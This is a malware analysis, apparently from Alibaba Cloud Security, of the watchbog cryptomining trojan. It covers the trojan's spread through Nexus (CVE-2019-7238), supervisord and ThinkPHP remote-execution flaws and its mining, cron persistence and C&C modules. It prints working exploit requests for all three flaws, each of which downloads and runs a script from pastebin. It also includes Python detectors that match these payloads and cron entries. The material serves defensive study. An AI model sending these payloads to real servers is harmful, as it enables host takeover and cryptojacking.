Recently, Alibaba Cloud Security observed the watchbog mining trojan exploiting the newly disclosed Nexus Repository Manager 3 remote code execution vulnerability (CVE-2019-7238) to compromise hosts and mine cryptocurrency.
It is worth noting that this attack began on February 24, only about half a month after the product's vendor published its vulnerability advisory on February 5, which once again confirms that the time between a vulnerability's disclosure and its use by criminal miners is growing ever shorter. In addition, the attackers also exploited vulnerabilities in products such as supervisord and ThinkPHP.
This article analyzes the trojan's internal structure and propagation method, and gives security recommendations on how to clean it up and prevent similar mining trojans.
Analysis of the mining trojan's propagation
The attackers propagate the trojan mainly by directly exploiting vulnerabilities in services running on the host, which means it currently has no worm-like self-propagation; in this respect it resembles the 8220 gang. Even so, the attackers still obtained a large number of compromised hosts.
In particular, on February 24 the attack code, which had previously targeted only ThinkPHP and supervisord, was extended with an exploit for Nexus Repository Manager 3. On that day the mining pool's hash rate can be seen surging roughly 3-fold to around 210 KH/s, earning about $25/day, which suggests that at its peak perhaps 1 to 2 million hosts were under the attackers' control and mining.
![Figure: mining pool hash rate surging on February 24](/Article/UploadPic/2019-3/20193122279481.jpg)
The following are the three kinds of attack payload captured by Alibaba Cloud Security.
(1) Exploit of the Nexus Repository Manager 3 remote code execution vulnerability (CVE-2019-7238):
```http
POST /service/extdirect HTTP/1.1
Host: <victim_ip>:8081
X-Requested-With: XMLHttpRequest
Content-Type: application/json

{"action": "coreui_Component", "type": "rpc", "tid": 8, "data": [{"sort": [{"direction": "ASC", "property": "name"}], "start": 0, "filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "233.class.forName('java.lang.Runtime').getRuntime().exec('curl -fsSL https://pastebin.com/raw/zXcDajSs -o /tmp/baby')"}, {"property": "type", "value": "jexl"}], "limit": 50, "page": 1}], "method": "previewAssets"}
```
(2) Exploit of the supervisord remote command execution vulnerability (CVE-2017-11610); the XML-RPC markup of the body was lost in extraction, so only the method name and its argument are shown:
```http
POST /RPC2 HTTP/1.1
Host: <victim_ip>:9001
Content-Type: application/x-www-form-urlencoded

methodName: supervisor.supervisord.options.warnings.linecache.os.system
param:      curl https://pastebin.com/raw/zXcDajSs -o /tmp/baby
```
(3) Exploit of the ThinkPHP remote command execution vulnerability:
```http
POST /index.php?s=captcha HTTP/1.1
Host: <victim_host>
Content-Type: application/x-www-form-urlencoded

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=curl -fsSL https://pastebin.com/raw/zXcDajSs -o /tmp/baby; bash /tmp/baby
```
All three payloads serve the same purpose: taking control of the host by executing the following command.
```shell
curl -fsSL https://pastebin.com/raw/zXcDajSs -o /tmp/baby; bash /tmp/baby
```
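As an added example (not part of the original analysis), the following Python detector labels HTTP requests that match the three delivery payloads above or the shared pastebin dropper command, so the delivery stage can be spotted in web-server or proxy logs. The sample requests are constructed, and the JSON and XML-RPC shapes are assumed from the payloads shown.

```python
import json
import re
from typing import Optional

# Signatures derived from the three delivery payloads shown in the article.
JEXL_RCE = re.compile(r"class\.forName|getRuntime\(\)|\.exec\(")
SUPERVISORD_RCE = re.compile(r"supervisor\.supervisord\.options\.[\w.]*os\.system")
THINKPHP_RCE = re.compile(r"_method=__construct.*filter\[\]=")
DROPPER = re.compile(r"curl\b[^;|&]*pastebin\.com/raw/\S+\s+-o\s+/tmp/")


def classify_request(path: str, body: str) -> Optional[str]:
    """Label the watchbog delivery payload a request matches, or None if nothing matches."""
    if path.startswith("/service/extdirect"):
        try:
            call = json.loads(body)
        except ValueError:
            return None
        if call.get("method") != "previewAssets":
            return None
        # The injected JEXL sits in the filter whose property is "expression".
        for batch in call.get("data") or []:
            for flt in batch.get("filter") or []:
                if (flt.get("property") == "expression"
                        and JEXL_RCE.search(str(flt.get("value", "")))):
                    return "CVE-2019-7238 Nexus JEXL RCE"
        return None
    if path.startswith("/RPC2") and SUPERVISORD_RCE.search(body):
        return "CVE-2017-11610 supervisord RCE"
    if "s=captcha" in path and THINKPHP_RCE.search(body):
        return "ThinkPHP filter RCE"
    if DROPPER.search(body):
        return "pastebin dropper command"
    return None


# Constructed sample requests modelled on the article's payloads (not captured traffic).
SAMPLES = {
    "nexus": ("/service/extdirect", json.dumps({"action": "coreui_Component", "method": "previewAssets",
        "data": [{"filter": [{"property": "repositoryName", "value": "*"},
                             {"property": "expression", "value":
                              "233.class.forName('java.lang.Runtime').getRuntime().exec('id')"},
                             {"property": "type", "value": "jexl"}]}]})),
    "supervisord": ("/RPC2", "<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>"),
    "thinkphp": ("/index.php?s=captcha", "_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id"),
    "benign": ("/service/extdirect", json.dumps({"action": "coreui_Component", "method": "read"})),
}
```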
Analysis of the trojan's functional structure
![Figure: functional structure of the watchbog trojan](/Article/UploadPic/2019-3/20193122271532.jpg)
The compromised host fetches https://pastebin.com/raw/zXcDajSs and, after several redirects, obtains the shell script shown in the figure below, which contains functions such as cronlow(), cronhigh() and flyaway().
![Figure: the downloaded shell script with cronlow(), cronhigh() and flyaway()](/Article/UploadPic/2019-3/20193122271895.jpg)
Analysis shows that the script consists mainly of the following modules:
1. Mining module
![Figure: the mining module](/Article/UploadPic/2019-3/20193122271914.jpg)
The mining module's download() function fetches a mining program modified from xmrig from https://ptpb.pw/D8r9 (the decoded content of $mi_64), saves it as /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog, downloads the configuration file from https://ptpb.pw/hgZI, and then starts mining.
Another function, testa(), is similar, except that it downloads the xmr-stak mining program.
2. Persistence module
The malicious command is written to /etc/cron.d/root and other files so that it keeps being executed.
![Figure: the persistence module writing to /etc/cron.d/root](/Article/UploadPic/2019-3/20193122271240.jpg)
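Added example, not from the original analysis: a check of /etc/cron.d-style entries for the persistence described above, which flags both the indicators named in this article (the pastebin, ptpb.pw and pixeldra.in hosts and the dropped paths) and the generic fetch-then-execute pattern the cron line uses. The sample crontab is constructed.

```python
import re
from typing import List, Tuple

# Indicators named in the article: the dropper host, the payload hosts and the dropped paths.
WATCHBOG_IOCS = ("pastebin.com/raw/", "ptpb.pw/", "pixeldra.in/",
                 "/tmp/baby", "/tmp/elavate", "watchbog", "systemd-timesyncc.service")
# Generic form of the same trick: fetch with curl/wget, then run the result through a shell.
REMOTE_EXEC = re.compile(r"\b(curl|wget)\b.*(\|\s*(ba)?sh\b|;\s*(ba)?sh\s+/tmp/)")
# /etc/cron.d layout: five time fields, a user name, then the command (@reboot shortcuts not handled).
CRON_D_LINE = re.compile(r"^\s*(\S+\s+){5}(\S+)\s+(.*)$")


def suspicious_cron_entries(cron_text: str) -> List[Tuple[str, str, str]]:
    """Return (user, command, reason) for cron.d-style lines that look like watchbog persistence."""
    hits = []
    for line in cron_text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#") or "=" in stripped.split()[0]:
            continue  # blank line, comment, or environment assignment such as SHELL=/bin/sh
        m = CRON_D_LINE.match(line)
        if not m:
            continue
        user, cmd = m.group(2), m.group(3)
        ioc = next((i for i in WATCHBOG_IOCS if i in cmd), None)
        if ioc:
            hits.append((user, cmd, f"known watchbog indicator: {ioc}"))
        elif REMOTE_EXEC.search(cmd):
            hits.append((user, cmd, "download-and-execute from remote host"))
    return hits


# Constructed sample modelled on the article's /etc/cron.d/root entry (not a real capture).
SAMPLE_CRON_D_ROOT = """\
SHELL=/bin/sh
PATH=/usr/bin:/bin
* * * * * root curl -fsSL https://pastebin.com/raw/zXcDajSs -o /tmp/baby; bash /tmp/baby
0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf
*/10 * * * * nobody wget -q -O - http://203.0.113.7/x.sh | sh
"""
```

Running it against the real /etc/cron.d files is a matter of reading each file's text into suspicious_cron_entries(); the command field of each hit is what needs to be removed during cleanup.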
3. C&C module
The C&C module is implemented mainly in the dragon() and flyaway() functions.
![Figure: the C&C module](/Article/UploadPic/2019-3/20193122272846.jpg)
The following figure shows the dragon() function after decoding.
![Figure: the decoded dragon() function](/Article/UploadPic/2019-3/20193122272974.jpg)
It requests several addresses in turn, such as https://pastebin.com/raw/05p0fTYd, and executes the commands it receives. Interestingly, these addresses currently hold only some common words, perhaps reserved by the trojan's author for future use.
The flyaway() function differs slightly from dragon(): it first downloads /tmp/elavate from https://pixeldra.in/api/download/8iFEEg.
![Figure: the flyaway() function](/Article/UploadPic/2019-3/20193122272758.jpg)